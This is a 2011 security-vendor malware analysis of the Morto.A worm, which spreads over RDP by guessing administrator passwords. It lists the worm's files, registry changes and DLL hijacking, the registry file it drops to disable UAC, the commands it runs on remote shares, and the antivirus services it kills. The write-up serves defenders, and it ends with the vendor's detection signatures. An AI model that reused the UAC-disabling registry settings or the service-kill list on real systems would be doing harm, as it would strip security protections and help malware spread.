RDP Worm Morto.A (Aug. 31, 2011)

SonicWALL UTM Research team received reports of a new internet worm propagating in the wild. This worm targets Remote Desktop Protocol (RDP) and has the capability to download additional malicious components, terminate Antivirus related security processes and services, perform Denial-of-Service attack (DDOS) and can be remotely controlled from a malicious server.

Process of Infection:

This worm targets machines via Remote Desktop Protocol (RDP) by compromising weak administrator passwords. Once a system is infected, it will scan the local network for RDP connections through port 3389. It uses a set of usernames and passwords to gain access to these RDP machines and infects them.

Installation:

This worm has three components: Main executable, DLL loader, and the payload.

Main Executable

The main executable drops the DLL loader ntshrui.dll on %windir%/temp directory and copies it as clb.dll on %windir% directory.

It adds the following registry entries as part of its installation:

• HKLMSYSTEMWpait
• HKLMSYSTEMWpaid
• HKLMSYSTEMWpaie
• HKLMSYSTEMWpasr
• HKLMSYSTEMWpasn
• HKLMSYSTEMWpamd

It then deletes the following registry to remove its tracks:

• HKCU “SoftwareMicrosoftWindowsCurrentVersionExplorerRunMRU”

The DLL loader clb.dll located at %windir% directory is loaded once the malware spawns the process Registry Editor (regedit.exe).

There is a legitimate DLL file clb.dll located in %windir%/system32 directory that regedit.exe actually uses. But because of the design of how windows loads files, wherein it will look for them at %windir% directory first before looking at %windir%/system32, the malware component clb.dll will in effect be loaded instead of the legitimate one.

DLL Loader

After getting loaded by the process regedit, it will decrypt the payload DLL and loads it to memory. It will also perform the following activities:

Added Registry:

Key: HKLMSYSTEMCurrentControlSetControlWindows
Value: “NoPopUpsOnBoot”
Data: “1”

Key: HKLMSYSTEMCurrentControlSetServices6to4Parameters
Value: “ServiceDll”
Data: “%windir%temp ntshrui.dll”

Modified Registry:

Key: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSENSParameters
Value: ServiceDll
Data Before: %SystemRoot%system32sens.dll Data After: %SystemRoot%system32sens32.dll

Added Files:

%windir%offline web pages{Current Date}
%windir%offline web pages1.40_testDdos
%windir%offline web pagescache.txt – blocked as [ GAV: Morto.A_2 (Trojan) ] %windir%system32sens32.dll – blocked as [ GAV: Morto.A_2 (Trojan) ]

DLL Payload

The malware attempts to connect to RDP servers on local network through port 3389 using administrator accounts. Some of the accounts are shown below:

It will copy the following files on the RDP workstations through \tsclienta.

• \tsclientaa.dll – blocked as [ GAV: Morto.A_2 (Trojan) ]
• \tsclientar.reg

Contents of the file r.reg is shown below which ensures rundll32.exe will run the malware with administrator privileges and without prompting for user for permission for any system changes:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem]
“ConsentPromptBehaviorAdmin”=dword:0
“EnableLUA”=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCuurrentVersionAppCompatFlagsLayers]
“c:\windows\system32\rundll32.exe”=”RUNASADMIN”
“d:\windows\system32\rundll32.exe”=”RUNASADMIN”
“e:\windows\system32\rundll32.exe”=”RUNASADMIN”
“f:\windows\system32\rundll32.exe”=”RUNASADMIN”
“g:\windows\system32\rundll32.exe”=”RUNASADMIN”
“h:\windows\system32\rundll32.exe”=”RUNASADMIN”
“i:\windows\system32\rundll32.exe”=”RUNASADMIN”

“c:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN”
“d:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN”
“e:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN”
“f:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN”
“g:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN”
“h:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN”
“i:\windows\SysWOW64\rundll32.exe”=”RUNASADMIN”

“c:\winnt\system32\rundll32.exe”=”RUNASADMIN”
“c:\win2008\system32\rundll32.exe”=”RUNASADMIN”
“c:\win2k8\system32\rundll32.exe”=”RUNASADMIN”
“c:\win7\system32\rundll32.exe”=”RUNASADMIN”
“c:\windows7\system32\rundll32.exe”=”RUNASADMIN”

Once files have been copied to RDP workstations, the malware will run those with the following commands:

• “regedit /s \tsclientar.reg”
• “rundll32 \tsclientaa.dll a”

It also terminates the following services related to AV security softwares:

• 360rp
• a2service
• ACAAS
• ArcaConfSV
• AvastSvc
• avguard
• avgwdsvc
• avp
• avpmapp
• ccSvcHst
• cmdagent
• coreService
• FortiScand
• FPAVServer
• freshclam
• fsdfwd
• GDFwSvc
• K7RTScan
• knsdave
• KVSrvXP
• kxescore
• mcshield
• MPSvc
• MsMpEng
• NSESVC.EXE
• PavFnSvr
• RavMonD
• SavService
• scanwscs
• Shell
• SpySweeper
• Vba32Ldr
• vsserv
• zhudongfangyu

Network Activities:

The malware tries to contact the following URLs:

• qf{REMOVED}.net
• ms.ji{REMOVED}nfo
• ms.ji{REMOVED}o.cc
• ms.ji{REMOVED}o.be

SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures:

GAV: Morto.A (Worm)
GAV: Morto.A_2 (Trojan)

Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.